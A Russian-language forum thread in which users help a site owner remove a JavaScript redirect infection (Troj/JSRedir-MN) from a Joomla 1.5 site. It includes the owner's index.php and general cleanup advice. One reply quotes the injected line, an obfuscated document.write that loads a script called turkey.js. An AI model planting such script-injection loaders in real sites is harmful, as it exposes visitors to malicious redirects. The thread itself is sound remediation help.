[Leorik]

Яндекс нашёл вирус Troj/JSRedir-MN на страницах сайта http://footballq.com/index.php/blog/entry/iffhsdek и http://footballq.com/index.php/uroki/tehnika/274-finty

Помогите, пожалуйста, удалить вирус сайта! очень нужно

[GROB666]

Проверьте файл .htaccess

[Leorik]

GROB666, ничего подозрительного

[CuxpecT]

cms какая?
проверьте index.php для начала

[Leorik]

CuxpecT, joomla 1.5

Вот:

PHP код:

<?php
/**
* @version        $Id: index.php 14401 2010-01-26 14:10:00Z louis $
* @package        Joomla
* @copyright    Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
* @license        GNU/GPL, see LICENSE.php
* Joomla! is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* See COPYRIGHT.php for copyright notices and details.
*/

// Set flag that this is a parent file
define( '_JEXEC', 1 );

define('JPATH_BASE', dirname(__FILE__) );

define( 'DS', DIRECTORY_SEPARATOR );

require_once ( JPATH_BASE .DS.'includes'.DS.'defines.php' );
require_once ( JPATH_BASE .DS.'includes'.DS.'framework.php' );

JDEBUG ? $_PROFILER->mark( 'afterLoad' ) : null;

/**
 * CREATE THE APPLICATION
 *
 * NOTE :
 */
$mainframe =& JFactory::getApplication('site');

/**
 * INITIALISE THE APPLICATION
 *
 * NOTE :
 */
// set the language
$mainframe->initialise();

JPluginHelper::importPlugin('system');

// trigger the onAfterInitialise events
JDEBUG ? $_PROFILER->mark('afterInitialise') : null;
$mainframe->triggerEvent('onAfterInitialise');

/**
 * ROUTE THE APPLICATION
 *
 * NOTE :
 */
$mainframe->route();

// authorization
$Itemid = JRequest::getInt( 'Itemid');
$mainframe->authorize($Itemid);

// trigger the onAfterRoute events
JDEBUG ? $_PROFILER->mark('afterRoute') : null;
$mainframe->triggerEvent('onAfterRoute');

/**
 * DISPATCH THE APPLICATION
 *
 * NOTE :
 */
$option = JRequest::getCmd('option');
$mainframe->dispatch($option);

// trigger the onAfterDispatch events
JDEBUG ? $_PROFILER->mark('afterDispatch') : null;
$mainframe->triggerEvent('onAfterDispatch');

/**
 * RENDER  THE APPLICATION
 *
 * NOTE :
 */
$mainframe->render();

// trigger the onAfterRender events
JDEBUG ? $_PROFILER->mark('afterRender') : null;
$mainframe->triggerEvent('onAfterRender');

/**
 * RETURN THE RESPONSE
 */
echo JResponse::toString($mainframe->getCfg('gzip'));

[CuxpecT]

блин, джумла...
ну в этом приведенном коде лично я не вижу ничего, следовательно далее нужно искать в скриптах и прочих подгружаемых инклудах.

p.s. шаблон на html? может там куда зашилось?

[ohmygod]

_http://footballq.com/plugins/system/CssJsCompress/js.php?js=7d639874a847eab07aef034a3811aeb1.js — последняя строчка

Код:

;document.write("<scr"+"ipt src='/media/system/js/turkey.js'><"+"/script>");

[3s777]

Можно попробовать восстановить сайт из чистого бэкапа, потом изменить все пароли, обновиться до последней версии, обновить все плагины и компоненты + поставить jsecure, и права на файлы темы и configaration и index нужно ограничить.

[Leorik]

ohmygod, удалил. больше нигде нет?

[ohmygod]

Leorik, поищите на хостинге swf-файлы (размером ≈ 1 КБ) + сделайте проверку ai-bolit для поиска шеллов с бэкдорами.